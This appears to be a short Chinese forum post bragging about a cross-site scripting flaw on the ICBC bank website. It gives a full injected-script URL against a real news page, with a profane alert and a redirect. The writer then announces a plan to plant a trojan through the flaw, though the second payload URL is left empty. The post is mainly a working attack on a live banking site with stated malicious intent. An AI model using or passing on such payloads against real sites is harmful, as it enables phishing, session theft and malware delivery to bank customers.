工商银行出跨站了….给大家看看…
在浏览器中提交跨站代码:http://www.icbc.com.cn/news/hotspot.jsp?column=%3Cscript%3Ealert("我操,我汤姆不发威,拿我当病老虎啊!");location.href%3D%22http%3A%2F%2F%22%3C/script%3E/
接着出现下图:
看到了吧,存在跨站漏洞,下面挂个马儿看看…
在浏览器中提交跨站代码:http://www.icbc.com.cn/news/hotspot.jsp?column=
